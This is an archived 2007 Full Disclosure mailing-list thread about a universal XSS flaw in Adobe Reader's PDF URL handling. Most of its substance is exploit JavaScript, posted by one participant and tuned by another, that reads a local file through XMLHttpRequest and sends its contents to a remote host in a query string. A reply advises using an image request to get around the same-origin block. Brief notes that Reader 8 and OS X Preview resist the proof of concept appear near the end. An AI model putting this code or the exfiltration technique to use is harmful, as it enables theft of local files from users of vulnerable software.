Full Disclosure mailing list archives

Re: Universal XSS with PDF files: highly dangerous

From: "pdp (architect)" <pdp.gnucitizen () googlemail com>
Date: Thu, 4 Jan 2007 21:22:08 +0000

I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use
images.

var img = new Image()
img.src = url;

this should work.

On 1/4/07, T Biehn <tbiehn () gmail com> wrote:

I'm trying to put together a demonstration of this vulnerability, and how it
could effect corporate security, however I'm encountering a large hangup
when sending a file 'back' to the webserver, the browser same origin policy
denies me the ability to send files to a different domain, which afaik is
necessary for an external attacker to properly exploit this vulnerability:

Here's the code I have so far, based more or less on PDP's

Vanilla, almost' PDP's (different url, spaces removed etc.)
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject('Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr =
cXHR();xhr.onreadystatechange = function(){if ( xhr.readyState ==
4)alert(xhr.responseText);};xhr.open('GET', 'file:///C:/Program
Files/Adobe/Acrobat 6.0/ReadMe.htm', true);xhr.send(null);

What I'm trying to do:
file:///C:/Program Files/Adobe/Acrobat
6.0/Resource/ENUtxt.pdf#something=javascript:function
cXHR(){try{return new ActiveXObject('Msxml2.XMLHTTP');}catch(e){}try{return
new ActiveXObject(' Microsoft.XMLHTTP');}catch(e){}try{return new
XMLHttpRequest();}catch(e){} return null;}var xhr = cXHR();var xhr2 =
cXHR();xhr.onreadystatechange = function(){if (xhr.readyState ==
4){alert(xhr.responseText);xhr2.open('GET', '
http://localhost:80/whatever.htm?content=&apos; +
xhr.responseText);xhr2.onreadystatechage = function(){alert('File
Transferred!');};xhr2.send(null);}};xhr.open('GET', '
file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);xhr.send(null);

Now, one would think that the LOCAL file operating mode of IE would allow
the cross domain XHR request, however this does not work (tested IE 6) I
think because by default IE disallows Javascript access on the local
context.

Try putting this is IE:
file:///C:/Program%20Files/Adobe/Acrobat%206.0/Resource/ENUtxt.pdf#something=javascript:alert('lol')
;
and then try it in FireFox

It won't work in IE 6, but it executes just fine in FireFox.

function cXHR(){ //Grabs a legit XHR.
    try{
        return new ActiveXObject('Msxml2.XMLHTTP');
    }catch(e){}
    try{
        return new ActiveXObject('Microsoft.XMLHTTP');
    }catch(e){}
    try{
        return new XMLHttpRequest();
    }catch(e){}
    return null;
}
var xhr = cXHR(); //For grabbing
var xhr2 = cXHR(); //For sending
xhr.onreadystatechange = function(){
    if (xhr.readyState == 4){
        alert(xhr.responseText);
        xhr2.open('GET', '
http://localhost:80/whatever.htm?content=&apos; +
xhr.responseText); //Send it up, yo.
        xhr2.onreadystatechage = function(){
            alert('File Transferred!');
        };
        xhr2.send (null);
    }
};
xhr.open('GET', 'file:///C:/Program Files/Adobe/Acrobat 6.0/ReadMe.htm',
true);
xhr.send(null);

Anyone's input on this matter would be appreciated.


On 1/4/07, Juha-Matti Laurio <juha-matti.laurio () netti fi> wrote:


Additionally, the public PoC doesn't work on Preview version 3.0.8 (409)

on OS X 10.4.8.


- Juha-Matti

Larry Seltzer <Larry () larryseltzer com> wrote:

"According to public reports, this vulnerability is addressed in Adobe

Acrobat Reader 8.0."

I've actually tested it. On Reader 8 Acrobat you get a messagebox that
says "This operation is not allowed"

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blog.eweek.com/blogs/larry%5Fseltzer/
Contributing Editor, PC Magazine
larryseltzer () ziffdavis com


_______________________________________________
Full-Disclosure - We believe in it.
Charter:

http://lists.grok.org.uk/full-disclosure-charter.html

Hosted and sponsored by Secunia - http://secunia.com/



-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Universal XSS with PDF files: highly dangerous, (continued)
- Re: Universal XSS with PDF files: highly dangerous Kristina Lein (Jan 05)
  - Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 05)
  - Re: Universal XSS with PDF files: highly dangerous Stefano Di Paola (Jan 05)
- Re: Universal XSS with PDF files: highly dangerous The Anarcat (Jan 08)
  - Re: Universal XSS with PDF files: highly dangerous Matthew Flaschen (Jan 08)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
  - Re: Universal XSS with PDF files: highly dangerous Larry Seltzer (Jan 04)
    - Re: [WEB SECURITY]RE: Universal XSS with PDF files: highly dangerous RSnake (Jan 04)
- Re: Universal XSS with PDF files: highly dangerous Juha-Matti Laurio (Jan 04)
  - Re: Universal XSS with PDF files: highly dangerous T Biehn (Jan 04)
    - Re: Universal XSS with PDF files: highly dangerous pdp (architect) (Jan 04)